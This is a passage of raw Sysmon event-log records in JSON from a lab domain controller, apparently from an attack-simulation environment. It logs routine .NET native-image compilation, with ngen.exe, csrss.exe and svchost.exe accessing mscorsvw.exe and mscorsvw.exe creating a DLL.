{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.960\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00108E210D00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.960","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00108E210D00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.960\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00108E210D00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.960","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00108E210D00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2269-5F25-0000-00103C780E00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2269-5F25-0000-00103C780E00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.991\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001030250D00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.991","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001030250D00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:01.991\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001030250D00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:01.991","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001030250D00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226A-5F25-0000-0010127B0E00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226A-5F25-0000-0010127B0E00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:02.038\r\nProcessGuid: {41C8662E-226A-5F25-0000-0010127B0E00}\r\nProcessId: 3292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cdc-0\\System.AddIn.Contract.dll\r\nCreationUtcTime: 2020-08-01 08:06:02.038","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:02.038","ProcessGuid":"{41C8662E-226A-5F25-0000-0010127B0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cdc-0\\System.AddIn.Contract.dll","CreationUtcTime":"2020-08-01 08:06:02.038","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.069\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00106EE40D00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.069","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00106EE40D00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.069\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00106EE40D00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 